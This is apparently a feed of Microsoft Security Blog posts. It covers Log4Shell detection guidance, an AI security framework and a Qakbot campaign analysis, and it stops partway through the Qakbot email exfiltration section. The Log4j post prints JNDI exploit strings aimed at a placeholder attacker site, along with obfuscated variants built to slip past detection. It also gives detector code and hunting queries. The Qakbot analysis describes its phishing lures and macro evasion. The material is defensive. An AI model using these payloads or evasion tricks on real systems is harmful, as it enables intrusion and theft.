If other people start shooting holes in your report, you need additional evidence, and that’s usually what will force validation. If someone sees that report and they’re not fighting it, it’s because they know that it’s the truth.

Natalia: What common mistakes do forensics investigators make?

Heather: The biggest mistake I see is trusting what a forensics tool reports without validating the evidence. Think about your phone. Did the artifact sync from a computer that your roommate is using and now it’s on your phone? Is it a suggestion, like when you’re typing into a search browser and it makes recommendations? Is it a shared document that you didn’t edit? There are all these considerations of how the evidence got there. You should not go from extracting a phone to reporting. There is a big piece in between. Verify and validate with more than one method and tool before you put it in your report.

Natalia: Are forensics investigation teams typically in-house or consultants?

Heather: There could be both. It depends on how frequently you need someone. I’ve been a consultant to big companies that offer incident response services. They don’t typically see mobile incidents, so they wanted me there just in case. If you do hire one person, don’t expect them to be a master of mobile, macOS, PC, and network security.

If you’re doing incident response investigations, you want someone with incident response, memory forensics, and network forensics experience. In the environments I’ve been in, we need dead disk forensics experience, so we need people who are masters of PC, macOS, and mobile because it’s usually data at rest that’s collected. It’s more terrorism and crime versus ransomware and hacking. You must weigh what you’re investigating, and if it’s all those things—terrorism/crime and ransomware/hacking—you need a forensics team because it’s rare that people are on both sides of that spectrum and really good at both.

Natalia: What advice would you give a security leader looking to hire and manage a forensics team?

Heather: When hiring people, question what they know. I’ve worked at many places where I was on the hiring team, and someone would say, “If they have X certification, they can skip to the next level.” Just because I don’t have a certification doesn’t mean I don’t know it. You also don’t know how someone scored. Make sure it’s a good cultural fit as well because with what we do in forensics, you need to rely on your teammates to get you through some of the things you come across.

When it comes to skill-building, I recommend encouraging your team to play in any free Capture the Flag provided by vendors, like SANS Institute. An employer could even put people together and say, “I want you three to work together and see how you do.” Letting your employees take training that inspires them and makes them want to keep learning is important.

Natalia: I appreciate you mentioning the difficulties of the role. It’s important to openly discuss the mental health challenges of being an investigator. How do you handle what you find in your investigations? And how do tools, like DFIR review, help?

Heather: I lean on my coworkers a lot. Especially if it’s a big case—like a missing person, someone going to trial, or someone losing their job—it’s a lot of pressure on you. You need people who understand that pressure and help you leave it behind because if it’s constantly going through your mind, it’s not healthy.

Digital Forensics and Incident Response (DFIR) review came out about two years ago. I have put many of my whitepapers and research through the deeper review process because it’s a group of other experts that validate your work. That makes a lot of organizations feel comfortable. “I know this device was wiped on X date and someone tried to cover their tracks because Heather wrote a paper, and it was peer-reviewed, and it got the gold seal.” That relieves a lot of pressure.

Learn more

Explore Microsoft’s technical guidance to help build and implement cybersecurity strategy and architecture.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Your guide to mobile digital forensics appeared first on Microsoft Security Blog.

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation

Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), the Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”.

The vulnerability allows unauthenticated remote code execution. It is triggered when a specially crafted string, supplied by the attacker through any of a variety of input vectors, is logged and then parsed by the vulnerable Log4j 2 component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog.

The bulk of the attacks Microsoft has observed at this time have been mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. An example attack pattern would appear in a web request log as a string like the following:

${jndi:ldap://[attacker site]/a}

An attacker sends an HTTP(S) request containing this string to the target system. The application logs part of that request with Log4j, which interprets the ${jndi:...} lookup and makes a JNDI request to the attacker-controlled site; the exploited process then retrieves the referenced payload and executes it. In many observed attacks, the attacker-owned endpoint is simply a DNS logging service: the callback records which systems processed the string, fingerprinting them as vulnerable.

The specially crafted string that enables execution of this vulnerability can be identified through several components. The string contains “jndi”, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”, precedes the attacker domain.

As security teams work to detect exploitation of the vulnerability, attackers have added obfuscation to these requests to evade detections based on request patterns. We have seen the lower and upper lookups nested inside the exploitation string (${jndi:${lower:l}${lower:d}a${lower:p}) and more complex variants built from the default-value syntax (${${::-j}${::-n}${::-d}${::-i}), all intended to bypass string-matching detections. Because Log4j resolves these inner lookups before evaluating the outer one, the string the vulnerable component acts on still reads ${jndi:ldap...}, which is why detections should normalize before matching.
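The following added example (not Microsoft’s detection logic, and not code from the original post) applies the two observations above: it undoes the lower/upper lookups and the ${...:-x} default-value syntax the way Log4j’s recursive substitution would, then matches the canonical ${jndi:<scheme>:...} form against the schemes listed earlier. The log lines are constructed for the example, and every host uses the reserved .invalid TLD.

```python
"""
Normalize Log4j 2 lookup obfuscation and flag JNDI lookups in log lines.

Added example, not Microsoft's detection logic. It resolves the innermost
${...} lookup repeatedly until the string stops changing, then matches the
canonical ${jndi:<scheme>:...} form. SAMPLE_LOG is constructed, not captured.
"""
import re
from typing import Optional

# Schemes named in the post as following "jndi:".
JNDI_SCHEMES = ("ldaps", "ldap", "rmi", "dns", "iiop", "http")

# An innermost lookup: ${...} containing no nested "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Canonical form after normalisation: ${jndi:<scheme>://<host>...
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(" + "|".join(JNDI_SCHEMES) + r")\s*:(?://)?([^/:}\s]*)",
    re.IGNORECASE,
)


def _resolve_one(inner: str) -> str:
    """Collapse one innermost lookup body to the literal Log4j would substitute.

    ${::-x}, ${env:NAME:-x}, ${sys:prop:-x} -> x      (default-value syntax)
    ${lower:X} -> x, ${upper:x} -> X
    Anything else (jndi:..., date:..., env without default) is left untouched so
    the detector still sees it.
    """
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    key, sep, value = inner.partition(":")
    if sep and key.strip().lower() == "lower":
        return value.lower()
    if sep and key.strip().lower() == "upper":
        return value.upper()
    return "${" + inner + "}"


def normalize(s: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups round by round until the string is stable."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve_one(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def detect_jndi(line: str) -> Optional[dict]:
    """Return {scheme, host, normalized} when the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2), "normalized": norm}


def scan(lines) -> list:
    """Run the detector over log lines; returns (line_no, scheme, host) for each hit."""
    hits = []
    for i, line in enumerate(lines, 1):
        r = detect_jndi(line)
        if r:
            hits.append((i, r["scheme"], r["host"]))
    return hits


# Constructed access-log lines (not real traffic). The User-Agent field is the vector.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://scan.example.invalid/a}"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "-" '
    '"${jndi:${lower:l}${lower:d}a${lower:p}://obf1.example.invalid/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://obf2.example.invalid/x}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme, host in scan(SAMPLE_LOG):
        print(f"line {line_no}: jndi:{scheme} -> {host}")
```

Normalizing before matching is what defeats the bypasses shown above; a plain `contains "jndi:"` rule, like the KQL queries later in the post, catches the first sample line but not the second or third. Any `${` that survives normalization marks a lookup the script does not model (for example `${env:X}` with no default), and those lines deserve a manual look rather than an automatic pass.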

At the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems. 

Microsoft security solutions help protect against and detect attacks

Microsoft 365 Defender

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:

On Windows:

  • Trojan:Win32/Capfetox.AA – detects attempted exploitation on the attacker machine
  • Trojan:Win64/DisguiseXMRigMiner – detection for coin mining post exploitation payloads
  • HackTool:Win32/Capfetox.A!dha – detects attempted exploitation on the attacker machine
  • VirTool:Win64/CobaltSrike.A, TrojanDropper:PowerShell/Cobacis.A – detects Cobalt Strike Beacon loaders

On Linux:

  • Trojan:Linux/SuspectJavaExploit.A, Trojan:Linux/SuspectJavaExploit.B, Trojan:Linux/SuspectJavaExploit.C – blocks Java processes downloading and executing payload through output redirection
  • Trojan:Linux/BashMiner.A – detects post-exploitation cryptocurrency miner
  • Exploit:Linux/CVE-2021-44228.A, Exploit:Linux/CVE-2021-44228.B – detects exploitation

Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.

  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Because this vulnerability can be reached through many network-facing input vectors, and because applying mitigations across large environments takes time, we encourage defenders to look for signs of post-exploitation rather than relying fully on prevention. Observed post-exploitation activity such as coin mining, lateral movement, and Cobalt Strike is detected with behavior-based detections.

Alerts with the following titles in the Security Center can indicate threat activity on your network:

  • Possible Log4j exploitation
  • Suspicious script launched (detects multiple behaviors, including suspicious command launch post exploitation)

Microsoft 365 Defender advanced hunting queries

To locate possible exploitation activity, run the following queries:

Possible Malicious Indicators in Cloud Application Events

This query is designed to flag exploitation attempts in which the attacker sends the crafted exploitation string through vectors such as the User-Agent, Application, or Account name. The hits returned by this query are most likely unsuccessful attempts; however, the results can be useful to identify attacker details such as IP address, payload string, and download URL.

CloudAppEvents
| where Timestamp > datetime("2021-12-09")
| where UserAgent contains "jndi:"
    or AccountDisplayName contains "jndi:"
    or Application contains "jndi:"
    or AdditionalFields contains "jndi:"
| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields

Possible vulnerable applications via M365D Threat and Vulnerability Management

This query looks for possibly vulnerable applications using the affected Log4j component. Please triage the results to determine applications and programs that may need to be patched and updated.

DeviceTvmSoftwareInventory
| where SoftwareName contains "log4j"
| project DeviceName, SoftwareName, SoftwareVersion

[Screenshot: Surfacing possibly vulnerable devices using Advanced Hunting in Threat and Vulnerability Management]

Finding possible vulnerable applications and devices via software inventory

Customers can also surface possibly vulnerable devices via Threat and Vulnerability Management capability in Microsoft Defender for Endpoint as part of Microsoft 365 Defender.

[Screenshot: Surfacing possibly vulnerable devices using Software Inventory]

Microsoft Defender for Cloud

The following are the current Microsoft Defender for Cloud detections:

On Windows

  • Detected obfuscated command line
  • Suspicious use of PowerShell detected

On Linux

  • Suspicious file download
  • Possible Cryptocoinminer download detected
  • Process associated with digital currency mining detected
  • Potential crypto coin miner started

Microsoft Sentinel queries

Possible exploitation of Apache log4j component detected

This hunting query looks for possible attempts to exploit the remote code execution vulnerability in the Apache Log4j component. Attackers pass crafted lookup strings to a server; when these are logged by Log4j they are evaluated, causing the process to retrieve and execute attacker-supplied code.

Crypto currency miners EXECVE

This query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell

RiskIQ EASM and Threat Intelligence

View Threat Intelligence on this CVE, including mitigation guidance and IOCs, here. Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it’s possible to surface all observed instances of Apache or Java, including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. 

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the Attack Surface Intelligence Dashboard Log4J Insights tab. 

Azure Firewall Premium 

Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE (CVE-2021-44228). Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) inspects all east-west traffic and outbound traffic to the internet. The vulnerability rulesets are continuously updated and have included CVE-2021-44228 signatures for several scenarios, covering UDP, TCP, and HTTP/S, since December 10th, 2021. The screenshot below shows the scenarios actively mitigated by Azure Firewall Premium.

Screenshot of Azure Firewall Premium

Recommendation: configure Azure Firewall Premium with IDPS in Alert and Deny mode and with TLS inspection enabled for proactive protection against CVE-2021-44228 exploitation. Without TLS inspection, IDPS signatures cannot see exploit strings carried inside encrypted HTTPS requests, so that traffic would pass unmatched.

Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall premium can learn more about Firewall Premium.

Indicators of compromise (IOCs)

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered:  https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.


Microsoft’s Response to CVE-2021-44228 Apache Log4j 2

December 12th, 2021

Published on: 2021 Dec 11 SUMMARY Microsoft is investigating the remote code execution vulnerability (CVE-2021-44228) related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. As we and the industry at large continue to gain a deeper understanding of the impact of this threat, we will publish technical …



Best practices for AI security risk management

December 9th, 2021

Today, we are releasing an AI security risk assessment framework as a step to empower organizations to reliably audit, track, and improve the security of the AI systems. In addition, we are providing new updates to Counterfit, our open-source tool to simplify assessing the security posture of AI systems.

There is a marked interest in securing AI systems from adversaries. Counterfit has been heavily downloaded and explored by organizations of all sizes—from startups to governments and large-scale organizations—to proactively secure their AI systems. From a different vantage point, the Machine Learning Evasion Competition we organized to help security professionals exercise their muscles to defend and attack AI systems in a realistic setting saw record participation, doubling the number of participants and techniques compared with the previous year.

This interest demonstrates the growth mindset and opportunity in securing AI systems. But how do we harness interest into action that can raise the security posture of AI systems? When the rubber hits the road, how can a security engineer think about mitigating the risk of an AI system being compromised?

AI security risk assessment framework

The deficit is clear: according to the Gartner® Market Guide for AI Trust, Risk and Security Management published in September 2021, “AI poses new trust, risk and security management requirements that conventional controls do not address.”1 To address this gap, we did not want to invent a new process. We acknowledge that security professionals are already overwhelmed. Moreover, we believe that even though attacks on AI systems pose a new security risk, current software security practices are relevant and can be adapted to manage this novel risk. To that end, we fashioned our AI security risk assessment in the spirit of the current security risk assessment frameworks.

We believe that to comprehensively assess the security risk for an AI system, we need to look at the entire lifecycle of system development and deployment. An overreliance on securing machine learning models through academic adversarial machine learning oversimplifies the problem in practice. This means, to truly secure the AI model, we need to account for securing the entire supply chain and management of AI systems.

Through our own operations experience in building and red teaming models at Microsoft, we recognize that securing AI systems is a team sport. AI researchers design model architectures. Machine learning engineers build data ingestion, model training, and deployment pipelines. Security architects establish appropriate security policies. Security analysts respond to threats. To that end, we envisioned a framework that would involve participation from each of these stakeholders.

“Designing and developing secure AI is a cornerstone of AI product development at Boston Consulting Group (BCG). As the societal need to secure our AI systems becomes increasingly apparent, assets like Microsoft’s AI security risk management framework can be foundational contributions. We already implement best practices found in this framework in the AI systems we develop for our clients and are excited that Microsoft has developed and open sourced this framework for the benefit of the entire industry.”—Jack Molloy, Senior Security Engineer, BCG

As a result of our Microsoft-wide collaboration, our framework features the following characteristics:

  1. Provides a comprehensive perspective to AI system security. We looked at each element of the AI system lifecycle in a production setting: from data collection, data processing, to model deployment. We also accounted for AI supply chains, as well as the controls and policies with respect to backup, recovery, and contingency planning related to AI systems.
  2. Outlines machine learning threats and recommendations to abate them. To directly help engineers and security professionals, we enumerated the threat statement at each step of the AI system building process. Next, we provided a set of best practices that overlay and reinforce existing software security practices in the context of securing AI systems.
  3. Enables organizations to conduct risk assessments. The framework provides the ability to gather information about the current state of security of AI systems in an organization, perform gap analysis, and track the progress of the security posture.

Updates to Counterfit

To help security professionals get a broader view of the security posture of the AI systems, we have also significantly expanded Counterfit. The first release of Counterfit wrapped two popular frameworks—Adversarial Robustness Toolbox (ART) and TextAttack—to provide evasion attacks against models operating on tabular, image, and textual inputs. With the new release, Counterfit now features the following:

  • An extensible architecture that simplifies integration of new attack frameworks.
  • Attacks that assume either full access to the internals of the machine learning model (white-box) or only query access to it (black-box).
  • Threat paradigms that include evasion, model inversion, model inference, and model extraction.
  • In addition to algorithmic attacks provided, common corruption attacks through AugLy are also included.
  • Attacks are supported for models that accept tabular data, images, text, HTML, or Windows executable files as input.

Learn More

These efforts are part of broader investment at Microsoft to empower engineers to securely develop and deploy AI systems. We recommend using it alongside the following resources:

  • For security analysts to orient to threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK style Adversarial Threat Matrix complete with case studies of attacks on production machine learning systems, which has evolved into MITRE ATLAS.
  • For security incident responders, we released our own bug bar to systematically triage attacks on machine learning systems.
  • For developers, we released threat modeling guidance specifically for machine learning systems.
  • For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.
  • For security professionals, Microsoft open sourced Counterfit to help with assessing the posture of AI systems.
  • For the broader security community, Microsoft hosted the annual Machine Learning Evasion Competition.
  • For Azure machine learning customers, we provided guidance on enterprise security and governance.

This is a living framework. If you have questions or feedback, please contact us.


1 Gartner, Market Guide for AI Trust, Risk and Security Management, Avivah Litan, et al., 1 September 2021 GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.


A closer look at Qakbot’s latest building blocks (and how to knock them down)

December 9th, 2021

Multiple Qakbot campaigns that are active at any given time prove that the decade-old malware continues to be many attackers’ tool of choice, a customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it. Since emerging in 2007 as a banking Trojan, Qakbot has evolved into a multi-purpose malware that provides attackers with a wide range of capabilities: performing reconnaissance and lateral movement, gathering and exfiltrating data, or delivering other payloads on affected devices.

Its modular nature allows Qakbot to persist in today’s computing landscape because it enables attackers to pick and choose the “building blocks” they need for each attack chain depending on the network environment the malware lands on. In many cases, the attackers who deliver Qakbot also sell access to affected devices to other threat actors, who use that access for their own goals. For example, Qakbot infections have been known to lead to human-operated ransomware, including Egregor or Conti. Its impact, therefore, is far-reaching: based on our threat data, recent Qakbot activities are seen in several countries and territories across almost all the continents: Africa, Asia, Europe, and the Americas.

Qakbot’s modularity and flexibility could pose a challenge for security analysts and defenders because concurrent Qakbot campaigns could look strikingly different on each affected device, significantly impacting how these defenders respond to such attacks. Therefore, a deeper understanding of Qakbot is paramount in building a comprehensive and coordinated defense strategy against it.

Based on our research and analysis of three recent notable Qakbot campaigns, we break down a Qakbot attack chain into several distinct building blocks. Within each campaign, some of these building blocks are consistent, although not all will be observed. Knowing these details allows defenders to correctly identify related threats and attacks, regardless of their source. Such intelligence and insights also feed into Microsoft’s multi-layer protection technologies, like those delivered through Microsoft 365 Defender, to detect and block these threats at various stages of the attack chain.

This blog post provides technical details of each of the building blocks that comprise Qakbot campaigns. It also includes mitigation recommendations and advanced hunting queries to help defenders proactively surface this threat.

From email to ransomware: Breaking down a Qakbot campaign

Like other modular malware, Qakbot infections may look different on each affected device, depending on the operator using the malware and how they deploy the campaign. However, based on our analysis, a Qakbot-related incident can be broken down into a set of distinct “building blocks,” which can help security analysts identify and respond to Qakbot campaigns. Figure 1 below represents these building blocks. From our observation, each Qakbot attack chain can have only one block of each color. The first row and the macro block represent the email mechanism used to deliver Qakbot.

Diagram showing components of Qakbot campaigns as building blocks

Figure 1. Qakbot attack chain “building blocks” observed

Certain building blocks within each campaign are consistent, but not all of them are observed on each affected device. As seen in a sample Qakbot campaign below (Figure 2), the top two rows represent the mechanisms adopted to deliver the malware on the three devices, while the succeeding ones are the activities it performs once running on each device. For instance, notice that Devices A and C were seen to have email exfiltration, while Device B was not:

Diagram showing building blocks making up different Qakbot campaigns

Figure 2. Sample differences among devices affected by a single Qakbot campaign

Therefore, from an analyst’s viewpoint, Figure 2 implies that even if email exfiltration was not observed on one device, it doesn’t mean that this routine didn’t happen at all in the organization’s network.

From our research, we identified ten building blocks, which we will discuss in the succeeding sections.

Email delivery

Qakbot is delivered via one of three email methods: malicious links, malicious attachments, or, more recently, embedded images.

The messages in these email campaigns typically consist of one- or two-sentence lures (for example, “please see attached” or “click here to view a file”). Such brevity provides sufficient information and a call to action for the target users but little for content security solutions to detect.

Screenshot of email with malicious URLs used in Qakbot campaign

Figure 3. Sample Qakbot campaign email message

Malicious links

The email campaigns we observed delivering Qakbot typically include the URLs that download the malware on target devices in the message body. Earlier this year, we began to observe that some of these URLs were missing the HTTP or HTTPS protocol, rendering them unclickable in most email clients. Therefore, to download the malware, target recipients had to manually enter the link into a browser.

Screenshot of email with unclickable links

Figure 4. Sample Qakbot campaign email containing an unclickable URL and fake-reply lure

Although the missing protocol poses a challenge for some email security solutions that detonate links through sandboxing, the extra step needed from targets to copy and paste the URL hinders the attack’s success rate. However, it should also be noted that what the messages sometimes lack in formatting, they make up for in the content by using fake-reply lures.

This fake-reply technique, which has already been seen in previous Qakbot and other major malware delivery campaigns, uses stolen subject lines and message content to construct a malicious reply to appear as part of a prior email thread. Qakbot is also known for reusing email threads exfiltrated from prior infections to create new templates for their next email campaign runs, allowing an attacker to use an actual subject line and message content to construct the spoofed reply. This increases the likelihood of target users clicking or copy-pasting the link because the message they receive from this campaign feels more expected. At the same time, attackers benefit from growing entropy among messages because no two emails in the same campaign will be alike. Unfortunately, such entropy also makes it more difficult for security analysts and defenders to fully scope a campaign.

Malicious attachments

Some Qakbot-related emails sent by attackers may include a ZIP file attachment. Within the ZIP is a spreadsheet containing Excel 4.0 macros.

The attachment name is meant to appear as an official corporate document to trick a target recipient into opening it. For example, between September and November this year, the naming patterns we observed for the attachment included but were not limited to the following:

  • CMPL-[digits]-[month]-[day].zip
  • Compensation_Reject-[digits]-[mmddyyyy].zip
  • Document_[digits]-[mmddyyyy].zip
  • Document_[digits]-Copy.zip
  • PRMS-[digits].zip
  • Rebate-[digits]-[mmddyyyy].zip
  • REF-[digits]-[month]-[day].zip
  • TXN-[digits].zip
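
To turn the naming patterns above into something a mail gateway rule or a hunting script can evaluate, here is an added Python example (not code from the original post or from Microsoft) that compiles each listed pattern into a regular expression and matches attachment names against it. The placeholder interpretations are assumptions, since the post does not define them: [digits] is any run of digits, [month] a number or month name, [day] one or two digits, and [mmddyyyy] a valid month and day followed by a four-digit year.

```python
import re

# Attachment naming patterns quoted in the post (September to November campaigns).
PATTERN_TEMPLATES = [
    "CMPL-[digits]-[month]-[day].zip",
    "Compensation_Reject-[digits]-[mmddyyyy].zip",
    "Document_[digits]-[mmddyyyy].zip",
    "Document_[digits]-Copy.zip",
    "PRMS-[digits].zip",
    "Rebate-[digits]-[mmddyyyy].zip",
    "REF-[digits]-[month]-[day].zip",
    "TXN-[digits].zip",
]

# Assumed meaning of each placeholder (the post does not define widths or formats).
PLACEHOLDERS = {
    "[digits]": r"\d+",
    "[month]": r"(?:\d{1,2}|[A-Za-z]{3,9})",
    "[day]": r"\d{1,2}",
    # month 01-12, day 01-31, then a four-digit year; rejects e.g. month "13"
    "[mmddyyyy]": r"(?:0[1-9]|1[0-2])(?:0[1-9]|[12]\d|3[01])\d{4}",
}


def template_to_regex(template: str) -> "re.Pattern":
    """Escape the literal parts of a template and substitute each placeholder.

    Unknown bracketed tokens are treated as literal text, so a typo in a
    template cannot silently widen the match.
    """
    pieces = re.split(r"(\[[a-z]+\])", template)
    out = [PLACEHOLDERS.get(p, re.escape(p)) for p in pieces]
    return re.compile("^" + "".join(out) + "$", re.IGNORECASE)


COMPILED = [(t, template_to_regex(t)) for t in PATTERN_TEMPLATES]


def match_attachment_name(name: str):
    """Return the first template the attachment name matches, or None."""
    for template, rx in COMPILED:
        if rx.match(name):
            return template
    return None


def scan_attachment_names(names):
    """Map each constructed attachment name to its matching template (or None)."""
    return {n: match_attachment_name(n) for n in names}
```
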

Screenshot of email with malicious ZIP attachment

Figure 5. Sample Qakbot campaign email containing a ZIP attachment

Embedded images

In its third and most recent evolution, Qakbot arrives via an email message that only contains an embedded image in its body, a stark contrast to its previous delivery methods that used file attachments or direct hyperlinks. We uncovered this Qakbot campaign while investigating malware infections from malicious Excel files associated with emails that abuse Craigslist’s email messaging system to deliver malicious files—a routine first reported by INKY.

This campaign is more involved than previous Qakbot email campaigns because, unlike its previous delivery methods, the malicious components in the email (in this case, the malicious URL) are not in the message body as text but are contained instead within an image designed to look like the message body. The image instructs recipients to type the URL directly in their browser to download an Excel file that eventually leads to Qakbot.

The said image is a screenshot of text formatted to impersonate an automated Craigslist notification, and it informs the target recipient of a supposed policy infraction on their Craigslist posting. The said fake notification further instructs the user to enter a URL into a browser to access a form for more detailed information, threatening to delete their account if they don’t follow.

Screenshot of email with image containing the malicious URL

Figure 6. Craigslist campaign email luring targets with an embedded image

Attackers crawl Craigslist ad posts to harvest email relay addresses, to which they then send custom-crafted messages directly. The email relay receives the sent messages, removes personal data (including the sender’s actual email address), appends the original post details to the end of the message, and then forwards it through Craigslist infrastructure to mask the original sender. As a result, the ad owner receives an anonymized email sent from the legitimate craigslist.org domain.

The attackers’ abuse of the email relay system allows them to remain anonymous and impersonate Craigslist. It also adds a sense of legitimacy to the messages because it comes from a popular domain that is generally deemed safe by traditional security solutions.

Based on our observation, this email campaign replies to job-related ads, which we believe is the attackers’ attempt to target recipients who open such types of messages while connected to a corporate network. However, based on our threat data, users’ success rate accessing the related malicious domains is relatively low. Such a result is likely because the campaign requires the target recipients to perform the additional step of typing a URL.

Macro enablement

Despite the varying email methods attackers are using to deliver Qakbot, these campaigns have in common their use of malicious macros in Office documents, specifically Excel 4.0 macros. It should be noted that while threats use Excel 4.0 macros as an attempt to evade detection, this feature is now disabled by default and thus requires users to enable it manually for such threats to execute properly.

Once the user downloads and opens the malicious Excel file, the text in the document attempts to lure them into enabling the macro. The said text claims that the file is “protected” by a service such as Microsoft or DocuSign, and that the user must enable the macro to view the document’s actual content.

Screenshot of malicious Excel file with lure to enable macros

Figure 7. XLS file with a DocuSign lure urging targets to enable macros

If the user goes ahead and enables the macro, Excel immediately checks if there is a subprocedure predefined in the macro to run automatically once the document opens; in this case, auto_open(). The Visual Basic for Applications (VBA) code written within this subprocedure creates a new macrosheet and then writes Excel 4.0 formulas in several of its cells. Next, it jumps to one cell in this sheet by calling the Application.Run method. In this way, the VBA code starts the Excel 4.0 macro code that was just written to the macrosheet.

Screenshot of malicious macro code

Figure 8. Example of an Excel 4.0 macro generated by the VBA script.

Generating and calling Excel 4.0 macro from VBA is an evasion technique to prevent static analysis tools from decoding the macro. When the user closes the document, the auto_close() function launches to clean up and remove the malicious macrosheet created by the VBA macro.

Qakbot delivery

Once macros are enabled, the next phase of the attack begins. First, the macro connects to a predefined set of IP addresses or domains to download the malicious files. Some macros are designed to connect to three domains simultaneously, downloading a file of the same name. This is likely done for one of two reasons: first, as a redundancy measure to ensure that the malware is still delivered even if one or two of the domains have been blocked or taken down; and second, to enable the attacker to deliver multiple payloads if desired.

Screenshot of malicious macro code for downloading payload

Figure 9. Portion of the generated Excel 4.0 macro that shows its attempts to download three payloads from three locations.

In most cases, the downloaded file is a Portable Executable (PE) file renamed with either an .htm or .dat file extension, in order to bypass web filtering systems that prevent certain file types. Depending on the specific campaign, the naming of these files varies greatly. For example, a recent campaign using .htm files named them with simple letters and numbers, such as goh[1].htm or j[1].htm. However, a separate campaign that used an invoice theme and used .dat files named them with an extremely long string of numbers, such as 44494.4409064815[1].dat. Again, these differences from campaign to campaign highlight that Qakbot is used simultaneously by different threat actors, which can make concurrent campaigns of the same malware look strikingly different.

Once this file is downloaded onto the device, the file is promptly renamed to a different file name with a nonexistent file name extension. Some examples include test.test and good.good (derived from .htm files), or GiCelod.waGic and Celod.wac (derived from .dat files). In many of the incidents involving .htm files, a folder called C:\Datop is created, and the files are saved in that location. Meanwhile, the incidents with .dat files are saved in the C:\Users\AppData\Local\Temp location.

Process injection for discovery

Whichever file the user ends up with is loaded using regsvr32.exe, which injects into a legitimate process. Both MSRA.exe and Mobsync.exe have been used for this process injection behavior in recent Qakbot-related campaigns.

The injected process is then used for a series of discovery commands, including the following:

Screenshot of commands executed via LOLBins

Scheduled tasks

The injected process from the previous building block then creates a .dll file with a randomly generated name. This DLL is used to query existing scheduled tasks for a specific ID, and if that scheduled task does not already exist, the DLL creates the task. The scheduled task is to run a predefined task as a means of persistence, as outlined in the following command line:

Screenshot of command to start a task

This scheduled task is created with the /F flag, which is used to suppress warnings if the specified task already exists, even though the malware has already queried for a specific scheduled task.

Credential and browser data theft

Qakbot attempts to steal credentials from multiple locations. First, the injected MSRA.exe or Mobsync.exe process loads the Vault Credential Library file to enumerate credentials. Additionally, this process injects into ping.exe and attempts to read credentials from CredMan using the passport.net\* parameter.

Qakbot also targets browser data. The injected process launches the esentutl.exe process. Browser data, including cookies and browser history, are recovered from the web cache using the following commands:

Screenshot of command for getting browser data via esentutl.exe

These commands specifically look for log files, system files, and database files (/l, /s, and /d).

Email exfiltration

As mentioned in a previous section, many of the emails delivering Qakbot use the fake-reply technique. To support this technique, Qakbot is also designed to exfiltrate emails from affected devices.

To exfiltrate emails, the injected process injects into ping.exe and launches a command to ping localhost:

Screenshot of code for pinging local host

